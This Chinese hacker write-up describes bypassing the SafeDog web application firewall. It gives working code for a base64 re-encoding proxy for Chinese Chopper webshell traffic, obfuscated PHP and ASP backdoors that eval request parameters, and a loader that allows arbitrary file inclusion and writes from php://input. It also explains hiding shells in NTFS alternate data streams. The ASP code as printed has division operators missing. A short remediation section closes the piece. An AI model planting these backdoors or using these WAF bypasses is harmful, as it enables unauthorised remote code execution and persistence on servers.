0x00 安全狗之菜刀的突破
#原理:
BAD: caidao -> safedog -X-> backdoor
GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao

菜刀发送的数据会被安全狗拦截,因为菜刀原始请求的特征已被纳入安全狗的规则库。
但如果在菜刀与安全狗之间放一个转发脚本(下文的 middle.php),把原始请求数据改写/编码后再由该脚本转发出去,
它就相当于一个代理:到达安全狗的流量不再命中特征,于是流到服务器上的 shell;shell 解码后执行,把结果返回给代理脚本,最终回到菜刀。注意这里所谓"加密"实际只是 base64 编码,并不提供任何保密性,只是改变了流量特征。

#代码
#middle.php

<?php
        /*
         * Author: Laterain
         * Time: 20130821
         * About: Middle monkey between the hacker and safedog.
         * Just For Fun
         *
         * Reviewer notes: this script is a forwarding proxy for webshell-client
         * traffic. It reads three query-string parameters (shell, pass, type),
         * rebuilds the POST body so that the first parameter carries a
         * base64-encoded stage instead of the client's original statement,
         * forwards the request to $url with curl, and echoes the response
         * back unchanged. Everything it consumes is attacker-supplied: no
         * validation is done on $url, $pass or $type, and no curl timeout
         * or TLS options are set.
         */
        // Target URL of the server-side backdoor; passed straight to curl.
        $url = isset($_GET['shell'])?$_GET['shell']:'';
        // Name of the POST parameter the backdoor reads its code from.
        $pass= isset($_GET['pass'])?$_GET['pass']:'';
        // Backdoor flavour. Any value other than 'php' or 'asp' leaves
        // $shellcode undefined below (PHP notice, empty value sent).
        $type= isset($_GET['type'])?$_GET['type']:'php';
        if ($type == 'php') {
                // Stage the PHP backdoor evals; it in turn evals the base64
                // body of the client's z0 POST parameter.
                $shellcode = base64_encode('@eval(base64_decode($_POST[z0]));');
        }
        elseif ($type == 'asp') {
                // For ASP the client's own statement (POST[$pass]) is
                // base64-encoded; the ASP backdoor decodes it before eval.
                $shellcode = base64_encode($_POST[$pass]);
        }
        // First body parameter: <pass>=<base64 stage>.
        $shellcode = $pass.'='.urlencode($shellcode);
        // Copy every other client POST parameter through (values URL-encoded,
        // keys not).
        foreach ($_POST as $key => $value) {
                if ($key == $pass) {
                        continue;
                }
                $shellcode .= '&'.$key.'='.urlencode($value);
        }
        // Forward as a POST and capture only the response body for relaying.
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $shellcode);
        $data = curl_exec($ch);
        curl_close($ch);
        // Relay the backdoor's output to the client. curl_exec returns false
        // on transport failure, which print_r prints as an empty string.
        print_r($data);
?>

#php backdoor

<?php
// Minimal obfuscated PHP backdoor. The two base64 literals decode to the
// pattern '/a/e' and the replacement 'eval(base64_decode($_REQUEST[$key]))'.
// With the /e modifier preg_replace evaluates the replacement as PHP code
// once the pattern matches the subject 'a', so any request carrying a
// 'hack' parameter (GET, POST or cookie, via $_REQUEST) has its base64
// payload executed. The /e modifier was deprecated in PHP 5.5 and removed
// in 7.0, so this only runs on older interpreters. Detection hints: a
// preg_replace whose pattern argument is base64_decode()'d, and
// eval/$_REQUEST hidden inside base64 literals.
$key = "hack";
preg_replace(base64_decode('L2EvZQ=='),base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFska2V5XSkp'),'a');
?>

#asp backdoor

<%
     OPTION EXPLICIT
     ' Standard base64 alphabet, indexed 0..63 by the encoder.
     const BASE_64_MAP_INIT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
     ' Index -> alphabet character (filled by initCodecs).
     dim Base64EncMap(63)
     ' ASCII code -> 6-bit value. Only the 64 alphabet slots are ever set,
     ' so a non-alphabet input byte reads back as Empty (treated as 0 in
     ' arithmetic); an ASCII code above 127 would index past the array.
     dim Base64DecMap(127)
         ' Holds the decoded request payload handed to eval at the bottom.
         dim code
     'Initialise the lookup tables
     PUBLIC SUB initCodecs()
          ' Build both lookup tables from BASE_64_MAP_INIT:
          ' Base64EncMap(i) = i-th alphabet char, Base64DecMap(asc(char)) = i.
          dim max, idx
             max = len(BASE_64_MAP_INIT)
          for idx = 0 to max - 1
               Base64EncMap(idx) = mid(BASE_64_MAP_INIT, idx + 1, 1)
          next
          for idx = 0 to max - 1
               Base64DecMap(ASC(Base64EncMap(idx))) = idx
          next
     END SUB
     'Base64 encoder (encoding only, not encryption)
     PUBLIC FUNCTION base64Encode(plain)
          ' Encode a byte string as base64 using Base64EncMap. "=" padding is
          ' deliberately NOT appended (both padding expressions are commented
          ' out), so the output length is not always a multiple of 4.
          ' NOTE(review): the integer-division operator appears to have been
          ' lost in transcription wherever two operands sit with only spaces
          ' between them, e.g. `len(plain) \ 3`, `first \ 4`, `second \ 16`,
          ' `third \ 64`; as printed those lines do not parse.
          if len(plain) = 0 then
               base64Encode = ""
               exit function
          end if
          dim ret, ndx, by3, first, second, third
          ' Number of input bytes that form complete 3-byte groups.
          by3 = (len(plain)  3) * 3
          ndx = 1
          do while ndx <= by3
               first = asc(mid(plain, ndx+0, 1))
               second = asc(mid(plain, ndx+1, 1))
               third = asc(mid(plain, ndx+2, 1))
               ' 24 input bits -> four 6-bit symbols.
               ret = ret & Base64EncMap( (first  4) AND 63 )
               ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second  16) AND 15 ) )
               ret = ret & Base64EncMap( ((second * 4) AND 60) + ((third  64) AND 3 ) )
               ret = ret & Base64EncMap( third AND 63)
               ndx = ndx + 3
          loop
          ' Trailing 1 or 2 bytes.
          if by3 < len(plain) then
               first = asc(mid(plain, ndx+0, 1))
               ret = ret & Base64EncMap( (first  4) AND 63 )
               if (len(plain) MOD 3 ) = 2 then
                    second = asc(mid(plain, ndx+1, 1))
                    ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second  16) AND 15 ) )
                    ret = ret & Base64EncMap( ((second * 4) AND 60) )
               else
                    ret = ret & Base64EncMap( (first * 16) AND 48)
                    ret = ret '& "="
               end if
               ret = ret '& "="
          end if
          base64Encode = ret
     END FUNCTION
     'Base64 decoder
     PUBLIC FUNCTION base64Decode(scrambled)
          ' Decode base64 text back to bytes via Base64DecMap. Trailing "="
          ' padding is stripped first; no other validation is done
          ' (non-alphabet characters map to Empty, i.e. 0, and an ASCII code
          ' above 127 indexes outside Base64DecMap).
          ' NOTE(review): as in base64Encode, the integer-division operator
          ' looks dropped here (`realLen \ 4`, `second \ 16`, `third \ 4`).
          if len(scrambled) = 0 then
               base64Decode = ""
               exit function
          end if
          dim realLen
          realLen = len(scrambled)
          ' Strip "=" padding. An input made only of "=" would drive realLen
          ' to 0 and appear to fail inside mid().
          do while mid(scrambled, realLen, 1) = "="
               realLen = realLen - 1
          loop
          dim ret, ndx, by4, first, second, third, fourth
          ret = ""
          ' Number of characters forming complete 4-symbol groups.
          by4 = (realLen  4) * 4
          ndx = 1
          do while ndx <= by4
               first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
               second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
               third = Base64DecMap(asc(mid(scrambled, ndx+2, 1)))
               fourth = Base64DecMap(asc(mid(scrambled, ndx+3, 1)))
               ' Four 6-bit symbols -> three bytes.
               ret = ret & chr( ((first * 4) AND 255) +   ((second  16) AND 3))
               ret = ret & chr( ((second * 16) AND 255) + ((third  4) AND 15))
               ret = ret & chr( ((third * 64) AND 255) + (fourth AND 63))
               ndx = ndx + 4
          loop
          ' Trailing 2 or 3 symbols; a single trailing symbol is ignored
          ' because ndx then equals realLen.
          if ndx < realLen then
               first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
               second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
               ret = ret & chr( ((first * 4) AND 255) +   ((second  16) AND 3))
               if realLen MOD 4 = 3 then
                    third = Base64DecMap(asc(mid(scrambled,ndx+2,1)))
                    ret = ret & chr( ((second * 16) AND 255) + ((third  4) AND 15))
               end if
          end if
          base64Decode = ret
     END FUNCTION
' Initialise the tables, then fetch, decode and execute the request payload
    ' Build the lookup tables before any decoding happens.
    call initCodecs
        ' Entry point of the backdoor: Request("hack") without a collection
        ' name searches the query string, form body and cookies for the
        ' parameter; its value is base64-decoded and executed as VBScript.
        ' The only "authentication" is knowing the parameter name.
        code = request("hack")
        code = base64Decode(code)
        eval code
%>

0x01 安全狗之突破恶意代码拦截
原理:
安全狗不检查 php://input(原始请求体),所以把恶意代码放在请求体里、而不是放在表单参数中,即可绕过参数级的检测。
把 shell 写到 NTFS 备用数据流(ADS,即路径中带 `:` 的文件流)里之后,再通过 include 包含它即可——ADS 中的文件无法直接通过 Web 访问,只能被包含。
base.php

<?php
// Loader used together with the php://input trick. Three modes are selected
// by query string:
//   ?inc=<path>   include() an arbitrary attacker-chosen path (local file
//                 inclusion; with allow_url_include on, stream/remote paths too)
//   ?path=<path>  write the raw request body (php://input) to an arbitrary
//                 path, creating the file; no extension or directory check
//   (neither)     echo this script's absolute path (__FILE__), which leaks
//                 the webroot layout
// NOTE(review): the fopen/fwrite pair never checks for failure and never
// closes the handle; if fopen fails, fwrite warns and writes nothing.
if (isset($_GET['inc'])) {
        include($_GET['inc']);        
}
elseif (isset($_GET['path'])) {
        fwrite(fopen($_GET['path'], "w"), file_get_contents("php://input"));
}
else {
        echo __FILE__;
}
?>

#修复建议:
1.由于 middle 可以对数据做任意变形/编码、backdoor 做对应解码,单靠流量特征来拦截菜刀数据很难根治;更可靠的是从 backdoor 入手,加强对服务器上后门文件的扫描探测——例如本文 PHP 后门中 preg_replace 的 /e 修饰符与 base64 隐藏的 eval/$_REQUEST、ASP 后门中对请求参数解码后直接 eval 的模式;此外对 POST 体中成段出现的 base64 数据先解码再匹配特征,也能覆盖这种绕过。
2.通过包含来获取 shell,除了加强特征码之外,还应从配置上限制包含:关闭 allow_url_include,设置 open_basedir,并避免 include/require 的参数直接来自请求。
3.无法发现 ADS 创建的后门的问题:服务器本身不允许直接访问 ADS 中的文件,只能通过包含来访问,因此可以把 include/require 参数中带 `:` 的归为危险(`:` 同样出现在 php://、data:// 等流封装路径中,一并拦截也是有益的);但要注意 Windows 绝对路径(如 `C:\...`)也含有 `:`,规则需排除盘符位置的冒号以免误报。当然能直接发现 ADS 文件更好。
4.对 php://input 的内容做过滤:WAF 应检查原始 POST 体,而不只检查解析后的表单参数;注意 allow_url_include=Off 只能阻止 include('php://input'),挡不住本文这种 file_get_contents('php://input') 再写文件的方式。
PS:本来以为php://input是我最先发现的,但是昨天看见某某在freebuf上提到了这个的利用,我就被打击了。。。于是就发出来吧。。。
作者:laterain from 90sec